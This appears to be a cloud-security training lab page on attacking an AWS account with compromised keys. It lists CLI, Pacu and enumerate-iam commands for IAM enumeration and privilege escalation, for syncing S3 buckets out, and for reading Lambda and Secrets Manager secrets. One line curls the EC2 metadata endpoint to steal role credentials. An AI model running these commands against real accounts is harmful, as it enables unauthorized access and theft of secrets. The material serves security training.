๐ŸŽฏ Lab Objectives

  • Configure AWS CLI with compromised access key credentials
  • Enumerate accessible services and resources
  • Identify IAM privilege escalation paths using Pacu
  • Find exposed S3 buckets and access sensitive data
  • Enumerate Lambda functions for hardcoded secrets in environment variables
  • Use enumerate-iam for automated permission discovery

Topics Covered

  • AWS CLI setup and credential types (access keys, role credentials)
  • IAM enumeration and policy document analysis
  • S3 bucket enumeration and data exfiltration
  • EC2 enumeration and IMDS exploitation
  • Lambda and Secrets Manager enumeration
  • IAM privilege escalation via policy attachment and PassRole

Setup

aws configure
# Access Key ID:    AKIAIOSFODNN7EXAMPLE
# Secret Access Key: wJalrXUtnFEMI/K7MDENG
# Region: us-east-1

aws sts get-caller-identity   # verify which identity you have

IAM Enumeration

# Current user's permissions
aws iam get-user
aws iam list-attached-user-policies --user-name USERNAME
aws iam list-user-policies --user-name USERNAME

# Read policy documents
aws iam get-policy --policy-arn ARN
aws iam get-policy-version --policy-arn ARN --version-id v1

# Enumerate all users and roles (if permitted)
aws iam list-users
aws iam list-roles

Automated Enumeration

# enumerate-iam โ€” brute force all accessible API calls
git clone https://github.com/andresriancho/enumerate-iam
python3 enumerate_iam.py --access-key KEY --secret-key SECRET

# Pacu โ€” AWS exploitation framework
python3 pacu.py
set_keys
run iam__enum_users_roles_policies_groups
run iam__privesc_scan

S3 Enumeration

# List all accessible buckets
aws s3 ls

# List and download bucket contents
aws s3 ls s3://target-bucket --recursive
aws s3 sync s3://target-bucket ./local-copy

# Check bucket policies and ACLs
aws s3api get-bucket-policy --bucket BUCKET
aws s3api get-bucket-acl --bucket BUCKET

EC2 & Metadata

# List instances with their roles
aws ec2 describe-instances --query 'Reservations[].Instances[].{ID:InstanceId,IP:PublicIpAddress,Role:IamInstanceProfile}'

# From inside EC2: steal role credentials
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Find publicly exposed security groups
aws ec2 describe-security-groups | grep -A5 "0.0.0.0/0"

Lambda & Secrets

# Lambda functions (environment variables often contain secrets)
aws lambda list-functions
aws lambda get-function-configuration --function-name FUNC

# Secrets Manager and Parameter Store
aws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id SECRET_ARN
aws ssm get-parameter --name PARAM_NAME --with-decryption
โœ…
Lab Complete! Mark it done below and continue your learning path.
โ† All Labs
// guided terminal

Try It Live

Type the commands from the steps above. The terminal simulates the expected output for this lab.

KaliRange ~ Terminal type help for commands
๐Ÿ“–
Sign in to track progress